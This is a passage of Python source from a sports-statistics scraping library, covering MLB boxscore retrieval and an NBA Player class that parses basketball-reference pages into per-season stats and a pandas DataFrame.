@int_property_decorator
def home_grounded_balls(self):
"""
Returns an ``int`` of the number of grounded balls the home team
allowed.
"""
return self._home_grounded_balls
@int_property_decorator
def home_fly_balls(self):
"""
Returns an ``int`` of the number of fly balls the home team allowed.
"""
return self._home_fly_balls
@int_property_decorator
def home_line_drives(self):
"""
Returns an ``int`` of the number of line drives the home team allowed.
"""
return self._home_line_drives
@int_property_decorator
def home_unknown_bat_type(self):
"""
Returns an ``int`` of the number of home at bats that were not properly
tracked and therefore cannot be safely placed in another statistical
category.
"""
return self._home_unknown_bat_type
@int_property_decorator
def home_game_score(self):
"""
Returns an ``int`` of the starting home pitcher's score determine by
many factors, such as number of runs scored against, number of strikes,
etc.
"""
return self._home_game_score
@int_property_decorator
def home_inherited_runners(self):
"""
Returns an ``int`` of the number of runners a pitcher inherited when he
entered the game.
"""
return self._home_inherited_runners
@int_property_decorator
def home_inherited_score(self):
"""
Returns an ``int`` of the number of scorers a pitcher inherited when he
entered the game.
"""
return self._home_inherited_score
@float_property_decorator
def home_win_probability_by_pitcher(self):
"""
Returns a ``float`` of the amount of influence the home pitcher had on
the game's result with 0.0 denoting zero influence and 1.0 denoting he
was solely responsible for the team's win.
"""
return self._home_win_probability_by_pitcher
@float_property_decorator
def home_base_out_runs_saved(self):
"""
Returns a ``float`` of the number of runs saved by the home pitcher
based on the number of players on bases. 0.0 denotes an average value.
"""
return self._home_base_out_runs_saved
class Boxscores:
"""
Search for MLB games taking place on a particular day.
Retrieve a dictionary which contains a list of all games being played on a
particular day. Output includes a link to the boxscore, and the names and
abbreviations for both the home teams. If no games are played on a
particular day, the list will be empty.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
end_date : datetime object (optional)
Optionally specify an end date to iterate until. All boxscores
starting from the date specified in the 'date' parameter up to and
including the boxscores specified in the 'end_date' parameter will be
pulled. If left empty, or if 'end_date' is prior to 'date', only the
games from the day specified in the 'date' parameter will be saved.
"""
def __init__(self, date, end_date=None):
self._boxscores = {}
self._find_games(date, end_date)
@property
def games(self):
"""
Returns a ``dictionary`` object representing all of the games played on
the requested day. Dictionary is in the following format::
{
'date': [ # 'date' is the string date in format 'MM-DD-YYYY'
{
'home_name': Name of the home team, such as 'New York
Yankees' (`str`),
'home_abbr': Abbreviation for the home team, such as
'NYY' (`str`),
'away_name': Name of the away team, such as 'Houston
Astros' (`str`),
'away_abbr': Abbreviation for the away team, such as
'HOU' (`str`),
'boxscore': String representing the boxscore URI, such
as 'SLN/SLN201807280' (`str`),
'winning_name': Full name of the winning team, such as
'New York Yankees' (`str`),
'winning_abbr': Abbreviation for the winning team, such
as 'NYY' (`str`),
'losing_name': Full name of the losing team, such as
'<NAME>' (`str`),
'losing_abbr': Abbreviation for the losing team, such
as 'HOU' (`str`),
'home_score': Integer score for the home team (`int`),
'away_score': Integer score for the away team (`int`)
},
{ ... },
...
]
}
If no games were played on 'date', the list for ['date'] will be empty.
"""
return self._boxscores
def _create_url(self, date):
"""
Build the URL based on the passed datetime object.
In order to get the proper boxscore page, the URL needs to include the
requested month, day, and year.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
Returns
-------
string
Returns a ``string`` of the boxscore URL including the requested
date.
"""
return BOXSCORES_URL % (date.year, date.month, date.day)
def _get_requested_page(self, url):
"""
Get the requested page.
Download the requested page given the created URL and return a PyQuery
object.
Parameters
----------
url : string
The URL containing the boxscores to find.
Returns
-------
PyQuery object
A PyQuery object containing the HTML contents of the requested
page.
"""
return pq(url)
def _get_boxscore_uri(self, url):
"""
Find the boxscore URI.
Given the boxscore tag for a game, parse the embedded URI for the
boxscore.
Parameters
----------
url : PyQuery object
A PyQuery object containing the game's boxscore tag which has the
boxscore URI embedded within it.
Returns
-------
string
Returns a ``string`` containing the link to the game's boxscore
page.
"""
uri = re.sub(r'.*/boxes/', '', str(url))
uri = re.sub(r'\.shtml.*', '', uri).strip()
return uri
def _parse_abbreviation(self, abbr):
"""
Parse a team's abbreviation.
Given the team's HTML name tag, parse their abbreviation.
Parameters
----------
abbr : string
A string of a team's HTML name tag.
Returns
-------
string
Returns a ``string`` of the team's abbreviation.
"""
abbr = re.sub(r'.*/teams/', '', str(abbr))
abbr = re.sub(r'/.*', '', abbr)
return abbr
def _get_name(self, name):
"""
Find a team's name and abbreviation.
Given the team's HTML name tag, determine their name, and abbreviation.
Parameters
----------
name : PyQuery object
A PyQuery object of a team's HTML name tag in the boxscore.
Returns
-------
tuple
Returns a tuple containing the name and abbreviation for a team.
Tuple is in the following order: Team Name, Team Abbreviation.
"""
team_name = name.text()
abbr = self._parse_abbreviation(name)
return team_name, abbr
def _get_score(self, score_link):
"""
Find a team's final score.
Given an HTML string of a team's boxscore, extract the integer
representing the final score and return the number.
Parameters
----------
score_link : string
An HTML string representing a team's final score in the format
'<td class="right">NN</td>' where 'NN' is the team's score.
Returns
-------
int
Returns an int representing the team's final score in runs.
"""
score = score_link.replace('<td class="right">', '')
score = score.replace('</td>', '')
return int(score)
def _get_team_details(self, game):
"""
Find the names and abbreviations for both teams in a game.
Using the HTML contents in a boxscore, find the name and abbreviation
for both teams.
Parameters
----------
game : PyQuery object
A PyQuery object of a single boxscore containing information about
both teams.
Returns
-------
tuple
Returns a tuple containing the names and abbreviations of both
teams in the following order: Away Name, Away Abbreviation, Away
Score, Home Name, Home Abbreviation, Home Score.
"""
links = [i for i in game('td a').items()]
# The away team is the first link in the boxscore
away = links[0]
# The home team is the last (3rd) link in the boxscore
home = links[-1]
scores = re.findall(r'<td class="right">\d+</td>', str(game))
away_score = self._get_score(scores[0])
home_score = self._get_score(scores[1])
away_name, away_abbr = self._get_name(away)
home_name, home_abbr = self._get_name(home)
return (away_name, away_abbr, away_score, home_name, home_abbr,
home_score)
def _get_team_results(self, team_result_html):
"""
Extract the winning or losing team's name and abbreviation.
Depending on which team's data field is passed (either the winner or
loser), return the name and abbreviation of that team to denote which
team won and which lost the game.
Parameters
----------
team_result_html : PyQuery object
A PyQuery object representing either the winning or losing team's
data field within the boxscore.
Returns
-------
tuple
Returns a tuple of the team's name followed by the abbreviation.
"""
link = [i for i in team_result_html('td a').items()]
# If there are no links, the boxscore is likely misformed and can't be
# parsed. In this case, the boxscore should be skipped.
if len(link) < 1:
return None
name, abbreviation = self._get_name(link[0])
return name, abbreviation
def _extract_game_info(self, games):
"""
Parse game information from all boxscores.
Find the major game information for all boxscores listed on a
particular boxscores webpage and return the results in a list.
Parameters
----------
games : generator
A generator where each element points to a boxscore on the parsed
boxscores webpage.
Returns
-------
list
Returns a ``list`` of dictionaries where each dictionary contains
the name and abbreviations for both the home and away teams, and a
link to the game's boxscore.
"""
all_boxscores = []
for game in games:
details = self._get_team_details(game)
away_name, away_abbr, away_score, home_name, home_abbr, \
home_score = details
boxscore_url = game('td[class="right gamelink"] a')
boxscore_uri = self._get_boxscore_uri(boxscore_url)
winner = self._get_team_results(game('tr[class="winner"]'))
# Occurs when information couldn't be parsed from the boxscore and
# the game should be skipped to avoid conflicts populating the
# game information.
if not winner:
continue
winning_name, winning_abbreviation = winner
loser = self._get_team_results(game('tr[class="loser"]'))
# Occurs when information couldn't be parsed from the boxscore and
# the game should be skipped to avoid conflicts populating the
# game information.
if not loser:
continue
losing_name, losing_abbreviation = loser
game_info = {
'boxscore': boxscore_uri,
'away_name': away_name,
'away_abbr': away_abbr,
'away_score': away_score,
'home_name': home_name,
'home_abbr': home_abbr,
'home_score': home_score,
'winning_name': winning_name,
'winning_abbr': winning_abbreviation,
'losing_name': losing_name,
'losing_abbr': losing_abbreviation
}
all_boxscores.append(game_info)
return all_boxscores
def _find_games(self, date, end_date):
"""
Retrieve all major games played on a given day.
Builds a URL based on the requested date and downloads the HTML
contents before parsing any and all games played during that day. Any
games that are found are added to the boxscores dictionary with
high-level game information such as the home and away team names and a
link to the boxscore page.
Parameters
----------
date : datetime object
The date to search for any matches. The month, day, and year are
required for the search, but time is not factored into the search.
end_date : datetime object (optional)
Optionally specify an end date to iterate until. All boxscores
starting from the date specified in the 'date' parameter up to and
including the boxscores specified in the 'end_date' parameter will
be pulled. If left empty, or if 'end_date' is prior to 'date', only
the games from the day specified in the 'date' parameter will be
saved.
"""
# Set the end date to the start date if the end date is before the
# start date.
if not end_date or date > end_date:
end_date = date
date_step = date
while date_step <= end_date:
url = self._create_url(date_step)
page = self._get_requested_page(url)
games = page('table[class="teams"]').items()
boxscores = self._extract_game_info(games)
timestamp = '%s-%s-%s' % (date_step.month, date_step.day,
date_step.year)
self._boxscores[timestamp] = boxscores
date_step += timedelta(days=1)
```
#### File: sportsreference/nba/roster.py
```python
import pandas as pd
import re
from datetime import datetime
from functools import wraps
from lxml.etree import ParserError, XMLSyntaxError
from pyquery import PyQuery as pq
from .. import utils
from .constants import NATIONALITY, PLAYER_SCHEME, PLAYER_URL, ROSTER_URL
from six.moves.urllib.error import HTTPError
def _cleanup(prop):
try:
prop = prop.replace('%', '')
prop = prop.replace('$', '')
prop = prop.replace(',', '')
return prop.replace('+', '')
# Occurs when a value is of Nonetype. When that happens, return a blank
# string as whatever have come in had an incomplete value.
except AttributeError:
return ''
def _int_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _int_property_decorator_default_zero(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to 0
return 0
return wrapper
def _float_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return float(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _most_recent_decorator(func):
@property
@wraps(func)
def wrapper(*args):
season = args[0]._most_recent_season
seasons = args[0]._season
index = seasons.index(season)
prop = func(*args)
return prop[index]
return wrapper
class Player(object):
"""
Get player information and stats for all seasons.
Given a player ID, such as 'hardeja01' for <NAME>, capture all
relevant stats and information like name, nationality, height/weight,
career three-pointers, last season's offensive rebounds, salary, contract
amount, and much more.
By default, the class instance will return the player's career stats, but
single-season stats can be found by calling the instance with the requested
season as denoted on basketball-reference.com.
Parameters
----------
player_id : string
A player's ID according to basketball-reference.com, such as
'hardeja01' for <NAME>. The player ID can be found by navigating
to the player's stats page and getting the string between the final
slash and the '.html' in the URL. In general, the ID is in the format
'LLLLLFFNN' where 'LLLLL' are the first 5 letters in the player's last
name, 'FF', are the first 2 letters in the player's first name, and
'NN' is a number starting at '01' for the first time that player ID has
been used and increments by 1 for every successive player.
"""
def __init__(self, player_id):
self._most_recent_season = ''
self._index = None
self._player_id = player_id
self._season = None
self._name = None
self._team_abbreviation = None
self._position = None
self._height = None
self._weight = None
self._birth_date = None
self._nationality = None
self._games_played = None
self._games_started = None
self._minutes_played = None
self._field_goals = None
self._field_goal_attempts = None
self._field_goal_percentage = None
self._three_pointers = None
self._three_point_attempts = None
self._three_point_percentage = None
self._two_pointers = None
self._two_point_attempts = None
self._two_point_percentage = None
self._effective_field_goal_percentage = None
self._free_throws = None
self._free_throw_attempts = None
self._free_throw_percentage = None
self._offensive_rebounds = None
self._defensive_rebounds = None
self._total_rebounds = None
self._assists = None
self._steals = None
self._blocks = None
self._turnovers = None
self._personal_fouls = None
self._points = None
self._player_efficiency_rating = None
self._true_shooting_percentage = None
self._three_point_attempt_rate = None
self._free_throw_attempt_rate = None
self._offensive_rebound_percentage = None
self._defensive_rebound_percentage = None
self._total_rebound_percentage = None
self._assist_percentage = None
self._steal_percentage = None
self._block_percentage = None
self._turnover_percentage = None
self._usage_percentage = None
self._offensive_win_shares = None
self._defensive_win_shares = None
self._win_shares = None
self._win_shares_per_48_minutes = None
self._offensive_box_plus_minus = None
self._defensive_box_plus_minus = None
self._box_plus_minus = None
self._value_over_replacement_player = None
self._shooting_distance = None
self._percentage_shots_two_pointers = None
self._percentage_zero_to_three_footers = None
self._percentage_three_to_ten_footers = None
self._percentage_ten_to_sixteen_footers = None
self._percentage_sixteen_foot_plus_two_pointers = None
self._percentage_shots_three_pointers = None
self._field_goal_perc_zero_to_three_feet = None
self._field_goal_perc_three_to_ten_feet = None
self._field_goal_perc_ten_to_sixteen_feet = None
self._field_goal_perc_sixteen_foot_plus_two_pointers = None
self._two_pointers_assisted_percentage = None
self._percentage_field_goals_as_dunks = None
self._dunks = None
self._three_pointers_assisted_percentage = None
self._percentage_of_three_pointers_from_corner = None
self._three_point_shot_percentage_from_corner = None
self._half_court_heaves = None
self._half_court_heaves_made = None
self._point_guard_percentage = None
self._shooting_guard_percentage = None
self._small_forward_percentage = None
self._power_forward_percentage = None
self._center_percentage = None
self._on_court_plus_minus = None
self._net_plus_minus = None
self._passing_turnovers = None
self._lost_ball_turnovers = None
self._other_turnovers = None
self._shooting_fouls = None
self._blocking_fouls = None
self._offensive_fouls = None
self._take_fouls = None
self._points_generated_by_assists = None
self._shooting_fouls_drawn = None
self._and_ones = None
self._shots_blocked = None
self._salary = None
self._contract = None
self._parse_player_data()
self._find_initial_index()
def _build_url(self):
"""
Create the player's URL to pull stats from.
The player's URL requires the first letter of the player's last name
followed by the player ID.
Returns
-------
string
The string URL for the player's stats page.
"""
# The first letter of the player's last name is used to sort the player
# list and is a part of the URL.
first_character = self._player_id[0]
return PLAYER_URL % (first_character, self._player_id)
def _retrieve_html_page(self):
"""
Download the requested player's stats page.
Download the requested page and strip all of the comment tags before
returning a pyquery object which will be used to parse the data.
Returns
-------
PyQuery object
The requested page is returned as a queriable PyQuery object with
the comment tags removed.
"""
url = self._build_url()
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_season(self, row):
"""
Parse the season string from the table.
The season is generally located in the first column of the stats tables
and should be parsed to denote which season metrics are being pulled
from.
Parameters
----------
row : PyQuery object
A PyQuery object of a single row in a stats table.
Returns
-------
string
A string representation of the season in the format 'YYYY-YY', such
as '2017-18'.
"""
return utils._parse_field(PLAYER_SCHEME, row, 'season')
def _combine_season_stats(self, table_rows, career_stats, all_stats_dict):
"""
Combine all stats for each season.
Since all of the stats are spread across multiple tables, they should
be combined into a single field which can be used to easily query stats
at once.
Parameters
----------
table_rows : generator
A generator where each element is a row in a stats table.
career_stats : generator
A generator where each element is a row in the footer of a stats
table. Career stats are kept in the footer, hence the usage.
all_stats_dict : dictionary
A dictionary of all stats separated by season where each key is the
season ``string``, such as '2017-18', and the value is a
``dictionary`` with a ``string`` of 'data' and ``string``
containing all of the data.
Returns
-------
dictionary
Returns an updated version of the passed all_stats_dict which
includes more metrics from the provided table.
"""
most_recent_season = ''
for row in table_rows:
season = self._parse_season(row)
try:
all_stats_dict[season]['data'] += str(row)
except KeyError:
all_stats_dict[season] = {'data': str(row)}
most_recent_season = season
self._most_recent_season = most_recent_season
try:
all_stats_dict['career']['data'] += str(next(career_stats))
except KeyError:
all_stats_dict['career'] = {'data': str(next(career_stats))}
return all_stats_dict
def _combine_all_stats(self, player_info):
"""
Pull stats from all tables into single data structure.
Pull the stats from all of the requested tables into a dictionary that
is separated by season to allow easy queries of the player's stats for
each season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing all of the stats information for the
requested player.
Returns
-------
dictionary
Returns a dictionary where all stats from each table are combined
by season to allow easy queries by year.
"""
all_stats_dict = {}
for table_id in ['totals', 'advanced', 'shooting', 'advanced_pbp',
'all_salaries']:
try:
table_items = utils._get_stats_table(player_info,
'table#%s' % table_id)
career_items = utils._get_stats_table(player_info,
'table#%s' % table_id,
footer=True)
# Error is thrown when player does not have the corresponding
# table, such as a rookie.
except (ParserError, XMLSyntaxError):
continue
all_stats_dict = self._combine_season_stats(table_items,
career_items,
all_stats_dict)
return all_stats_dict
def _parse_nationality(self, player_info):
"""
Parse the player's nationality.
The player's nationality is denoted by a flag in the information
section with a country code for each nation. The country code needs to
pulled and then matched to find the player's home country. Once found,
the '_nationality' attribute is set for the player.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
for span in player_info('span').items():
if 'class="f-i' in str(span):
nationality = span.text()
nationality = NATIONALITY[nationality]
setattr(self, '_nationality', nationality)
break
def _parse_player_information(self, player_info, field):
"""
Parse general player information.
Parse general player information such as height, weight, and name. The
attribute for the requested field will be set with the value prior to
returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
field : string
A string of the attribute to parse, such as 'weight'.
"""
short_field = str(field)[1:]
value = utils._parse_field(PLAYER_SCHEME, player_info, short_field)
setattr(self, field, value)
def _parse_birth_date(self, player_info):
"""
Parse the player's birth date.
Pull the player's birth date from the player information and set the
'_birth_date' attribute with the value prior to returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
date = player_info('span[itemprop="birthDate"]').attr('data-birth')
setattr(self, '_birth_date', date)
def _parse_contract_headers(self, table):
"""
Parse the years on the contract.
The years are listed as the headers on the contract. The first header
contains 'Team' which specifies the player's current team and should
not be included in the years.
Parameters
----------
table : PyQuery object
A PyQuery object containing the contract table.
Returns
-------
list
Returns a list where each element is a string denoting the season,
such as '2017-18'.
"""
years = [i.text() for i in table('th').items()]
years.remove('Team')
return years
def _parse_contract_wages(self, table):
"""
Parse the wages on the contract.
The wages are listed as the data points in the contract table. Any
values that don't have a value which starts with a '$' sign are likely
not valid and should be dropped.
Parameters
----------
table : PyQuery object
A PyQuery object containing the contract table.
Returns
-------
list
Returns a list of all wages where each element is a string denoting
the dollar amount, such as '$40,000,000'.
"""
wages = [i.text() if i.text().startswith('$') else ''
for i in table('td').items()]
wages.remove('')
return wages
def _combine_contract(self, years, wages):
"""
Combine the contract wages and year.
Match the wages with the year and add to a dictionary representing the
player's contract.
Parameters
----------
years : list
A list where each element is a string denoting the season, such as
'2017-18'.
wages : list
A list of all wages where each element is a string denoting the
dollar amount, such as '$40,000,000'.
Returns
-------
dictionary
Returns a dictionary representing the player's contract where each
key is a ``string`` of the season, such as '2017-18' and each value
is a ``string`` of the wages, such as '$40,000,000'.
"""
contract = {}
for i in range(len(years)):
contract[years[i]] = wages[i]
return contract
def _parse_contract(self, player_info):
"""
Parse the player's contract.
Depending on the player's contract status, a contract table is located
at the bottom of the stats page and includes player wages by season. If
found, create a dictionary housing the wages by season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
"""
tables = player_info('table').items()
for table in tables:
id_attr = table.attr('id')
if id_attr:
if id_attr.startswith('contracts_'):
years = self._parse_contract_headers(table)
wages = self._parse_contract_wages(table)
contract = self._combine_contract(years, wages)
# If the contract is empty, the player likely doesn't have
# a contract and should have a value of None instead.
if contract == {}:
contract = None
setattr(self, '_contract', contract)
break
def _parse_player_data(self):
"""
Parse all player information and set attributes.
Pull the player's HTML stats page and go through each class attribute
to parse the data from the HTML page and set attribute value with the
result.
"""
player_info = self._retrieve_html_page()
all_stats_dict = self._combine_all_stats(player_info)
for field in self.__dict__:
short_field = str(field)[1:]
if short_field == 'player_id' or \
short_field == 'index' or \
short_field == 'most_recent_season':
continue
if short_field == 'name' or \
short_field == 'weight' or \
short_field == 'height':
self._parse_player_information(player_info, field)
continue
if short_field == 'nationality':
self._parse_nationality(player_info)
continue
if short_field == 'birth_date':
self._parse_birth_date(player_info)
continue
if short_field == 'contract':
self._parse_contract(player_info)
continue
field_stats = []
for year, data in all_stats_dict.items():
stats = pq(data['data'])
value = utils._parse_field(PLAYER_SCHEME, stats, short_field)
field_stats.append(value)
setattr(self, field, field_stats)
def _find_initial_index(self):
"""
Find the index of career stats.
When the Player class is instantiated, the default stats to pull are
the player's career stats. Upon being called, the index of the 'Career'
element should be the index value.
"""
index = 0
for season in self._season:
if season == 'Career':
self._index = index
break
index += 1
def __call__(self, requested_season=''):
"""
Specify a different season to pull stats from.
A different season can be requested by passing the season string, such
as '2017-18' to the class instance.
Parameters
----------
requested_season : string (optional)
A string of the requested season to query, such as '2017-18'. If
left blank or 'Career' is passed, the career stats will be used for
stats queries.
Returns
-------
Player class instance
Returns the class instance with the updated stats being referenced.
"""
if requested_season.lower() == 'career' or \
requested_season == '':
requested_season = 'Career'
index = 0
for season in self._season:
if season == requested_season:
self._index = index
break
index += 1
return self
def _dataframe_fields(self):
"""
Creates a dictionary of all fields to include with DataFrame.
With the result of the calls to class properties changing based on the
class index value, the dictionary should be regenerated every time the
index is changed when the dataframe property is requested.
Returns
-------
dictionary
Returns a dictionary where the keys are the shortened ``string``
attribute names and the values are the actual value for each
attribute for the specified index.
"""
fields_to_include = {
'and_ones': self.and_ones,
'assist_percentage': self.assist_percentage,
'assists': self.assists,
'block_percentage': self.block_percentage,
'blocking_fouls': self.blocking_fouls,
'blocks': self.blocks,
'box_plus_minus': self.box_plus_minus,
'center_percentage': self.center_percentage,
'defensive_box_plus_minus': self.defensive_box_plus_minus,
'defensive_rebound_percentage': self.defensive_rebound_percentage,
'defensive_rebounds': self.defensive_rebounds,
'defensive_win_shares': self.defensive_win_shares,
'dunks': self.dunks,
'effective_field_goal_percentage':
self.effective_field_goal_percentage,
'field_goal_attempts': self.field_goal_attempts,
'field_goal_perc_sixteen_foot_plus_two_pointers':
self.field_goal_perc_sixteen_foot_plus_two_pointers,
'field_goal_perc_ten_to_sixteen_feet':
self.field_goal_perc_ten_to_sixteen_feet,
'field_goal_perc_three_to_ten_feet':
self.field_goal_perc_three_to_ten_feet,
'field_goal_perc_zero_to_three_feet':
self.field_goal_perc_zero_to_three_feet,
'field_goal_percentage': self.field_goal_percentage,
'field_goals': self.field_goals,
'free_throw_attempt_rate': self.free_throw_attempt_rate,
'free_throw_attempts': self.free_throw_attempts,
'free_throw_percentage': self.free_throw_percentage,
'free_throws': self.free_throws,
'games_played': self.games_played,
'games_started': self.games_started,
'half_court_heaves': self.half_court_heaves,
'half_court_heaves_made': self.half_court_heaves_made,
'height': self.height,
'lost_ball_turnovers': self.lost_ball_turnovers,
'minutes_played': self.minutes_played,
'nationality': self.nationality,
'net_plus_minus': self.net_plus_minus,
'offensive_box_plus_minus': self.offensive_box_plus_minus,
'offensive_fouls': self.offensive_fouls,
'offensive_rebound_percentage': self.offensive_rebound_percentage,
'offensive_rebounds': self.offensive_rebounds,
'offensive_win_shares': self.offensive_win_shares,
'on_court_plus_minus': self.on_court_plus_minus,
'other_turnovers': self.other_turnovers,
'passing_turnovers': self.passing_turnovers,
'percentage_field_goals_as_dunks':
self.percentage_field_goals_as_dunks,
'percentage_of_three_pointers_from_corner':
self.percentage_of_three_pointers_from_corner,
'percentage_shots_three_pointers':
self.percentage_shots_three_pointers,
'percentage_shots_two_pointers':
self.percentage_shots_two_pointers,
'percentage_sixteen_foot_plus_two_pointers':
self.percentage_sixteen_foot_plus_two_pointers,
'percentage_ten_to_sixteen_footers':
self.percentage_ten_to_sixteen_footers,
'percentage_three_to_ten_footers':
self.percentage_three_to_ten_footers,
'percentage_zero_to_three_footers':
self.percentage_zero_to_three_footers,
'personal_fouls': self.personal_fouls,
'player_efficiency_rating': self.player_efficiency_rating,
'player_id': self.player_id,
'point_guard_percentage': self.point_guard_percentage,
'points': self.points,
'points_generated_by_assists': self.points_generated_by_assists,
'position': self.position,
'power_forward_percentage': self.power_forward_percentage,
'salary': self.salary,
'shooting_distance': self.shooting_distance,
'shooting_fouls': self.shooting_fouls,
'shooting_fouls_drawn': self.shooting_fouls_drawn,
'shooting_guard_percentage': self.shooting_guard_percentage,
'shots_blocked': self.shots_blocked,
'small_forward_percentage': self.small_forward_percentage,
'steal_percentage': self.steal_percentage,
'steals': self.steals,
'take_fouls': self.take_fouls,
'team_abbreviation': self.team_abbreviation,
'three_point_attempt_rate': self.three_point_attempt_rate,
'three_point_attempts': self.three_point_attempts,
'three_point_percentage': self.three_point_percentage,
'three_point_shot_percentage_from_corner':
self.three_point_shot_percentage_from_corner,
'three_pointers': self.three_pointers,
'three_pointers_assisted_percentage':
self.three_pointers_assisted_percentage,
'total_rebound_percentage': self.total_rebound_percentage,
'total_rebounds': self.total_rebounds,
'true_shooting_percentage': self.true_shooting_percentage,
'turnover_percentage': self.turnover_percentage,
'turnovers': self.turnovers,
'two_point_attempts': self.two_point_attempts,
'two_point_percentage': self.two_point_percentage,
'two_pointers': self.two_pointers,
'two_pointers_assisted_percentage':
self.two_pointers_assisted_percentage,
'usage_percentage': self.usage_percentage,
'value_over_replacement_player':
self.value_over_replacement_player,
'weight': self.weight,
'win_shares': self.win_shares,
'win_shares_per_48_minutes': self.win_shares_per_48_minutes
}
return fields_to_include
@property
def dataframe(self):
"""
Returns a ``pandas DataFrame`` containing all other relevant class
properties and values where each index is a different season plus the
career stats.
"""
temp_index = self._index
rows = []
indices = []
for season in self._season:
self._index = self._season.index(season)
rows.append(self._dataframe_fields())
indices.append(season)
self._index = temp_index
return pd.DataFrame(rows, index=[indices])
@property
def player_id(self):
"""
Returns a ``string`` of the player's ID on sports-reference, such as
'hardeja01' for <NAME>.
"""
return self._player_id
@property
def season(self):
"""
Returns a ``string`` of the season in the format 'YYYY-YY', such as
'2017-18'. If no season was requested, the career stats will be
returned for the player and the season will default to 'Career'.
"""
return self._season[self._index]
@property
def name(self):
"""
Returns a ``string`` of the players name, such as '<NAME>'.
"""
return self._name
@property
def team_abbreviation(self):
"""
Returns a ``string`` of the abbrevation for the team the player plays
for, such as 'HOU' for <NAME>.
"""
return self._team_abbreviation[self._index]
@_most_recent_decorator
def position(self):
"""
Returns a ``string`` constant of the player's primary position.
"""
return self._position
@property
def height(self):
"""
Returns a ``string`` of the player's height in the format
"feet-inches".
"""
return self._height
@property
def weight(self):
"""
Returns an ``int`` of the player's weight in pounds.
"""
return int(self._weight.replace('lb', ''))
@property
def birth_date(self):
"""
Returns a ``datetime`` object of the day and year the player was born.
"""
return datetime.strptime(self._birth_date, '%Y-%m-%d')
@property
def nationality(self):
"""
Returns a ``string`` constant denoting which country the player
originates from.
"""
return self._nationality
@_int_property_decorator
def games_played(self):
"""
Returns an ``int`` of the number of games the player participated in.
"""
return self._games_played
@_int_property_decorator
def games_started(self):
"""
Returns an ``int`` of the number of games the player started.
"""
return self._games_started
@_int_property_decorator
def minutes_played(self):
"""
Returns an ``int`` of the total number of minutes the player played.
"""
return self._minutes_played
@_int_property_decorator
def field_goals(self):
"""
Returns an ``int`` of the total number of field goals the player
scored.
"""
return self._field_goals
@_int_property_decorator
def field_goal_attempts(self):
"""
Returns an ``int`` of the total number of field goals the player
attempted during the season.
"""
return self._field_goal_attempts
@_float_property_decorator
def field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage during the
season. Percentage ranges from 0-1.
"""
return self._field_goal_percentage
@_int_property_decorator
def three_pointers(self):
"""
Returns an ``int`` of the total number of three point field goals the
player made.
"""
return self._three_pointers
@_int_property_decorator
def three_point_attempts(self):
"""
Returns an ``int`` of the total number of three point field goals the
player attempted during the season.
"""
return self._three_point_attempts
@_float_property_decorator
def three_point_percentage(self):
"""
Returns a ``float`` of the player's three point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._three_point_percentage
@_int_property_decorator
def two_pointers(self):
"""
Returns an ``int`` of the total number of two point field goals the
player made.
"""
return self._two_pointers
@_int_property_decorator
def two_point_attempts(self):
"""
Returns an ``int`` of the total number of two point field goals the
player attempted during the season.
"""
return self._two_point_attempts
@_float_property_decorator
def two_point_percentage(self):
"""
Returns a ``float`` of the player's two point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._two_point_percentage
@_float_property_decorator
def effective_field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage while giving
extra weight to 3-point field goals. Percentage ranges from 0-1.
"""
return self._effective_field_goal_percentage
@_int_property_decorator
def free_throws(self):
"""
Returns an ``int`` of the total number of free throws the player made
during the season.
"""
return self._free_throws
@_int_property_decorator
def free_throw_attempts(self):
"""
Returns an ``int`` of the total number of free throws the player
attempted during the season.
"""
return self._free_throw_attempts
@_float_property_decorator
def free_throw_percentage(self):
"""
Returns a ``float`` of the player's free throw percentage during the
season. Percentage ranges from 0-1.
"""
return self._free_throw_percentage
@_int_property_decorator
def offensive_rebounds(self):
"""
Returns an ``int`` of the total number of offensive rebounds the player
grabbed during the season.
"""
return self._offensive_rebounds
@_int_property_decorator
def defensive_rebounds(self):
"""
Returns an ``int`` of the total number of defensive rebounds the player
grabbed during the season.
"""
return self._defensive_rebounds
@_int_property_decorator
def total_rebounds(self):
"""
Returns an ``int`` of the total number of offensive and defensive
rebounds the player grabbed during the season.
"""
return self._total_rebounds
@_int_property_decorator
def assists(self):
"""
Returns an ``int`` of the total number of assists the player tallied
during the season.
"""
return self._assists
@_int_property_decorator
def steals(self):
"""
Returns an ``int`` of the total number of steals the player tallied
during the season.
"""
return self._steals
@_int_property_decorator
def blocks(self):
"""
Returns an ``int`` of the total number of shots the player blocked
during the season.
"""
return self._blocks
@_int_property_decorator
def turnovers(self):
"""
Returns an ``int`` of the total number of times the player turned the
ball over during the season for any reason.
"""
return self._turnovers
@_int_property_decorator
def personal_fouls(self):
"""
Returns an ``int`` of the total number of personal fouls the player
committed during the season.
"""
return self._personal_fouls
@_int_property_decorator
def points(self):
"""
Returns an ``int`` of the total number of points the player scored
during the season.
"""
return self._points
@_float_property_decorator
def player_efficiency_rating(self):
"""
Returns a ``float`` of the player's efficiency rating which represents
the player's relative production level. An average player in the league
has an efficiency rating of 15.
"""
return self._player_efficiency_rating
@_float_property_decorator
def true_shooting_percentage(self):
"""
Returns a ``float`` of the player's true shooting percentage which
takes into account two and three pointers as well as free throws.
Percentage ranges from 0-1.
"""
return self._true_shooting_percentage
@_float_property_decorator
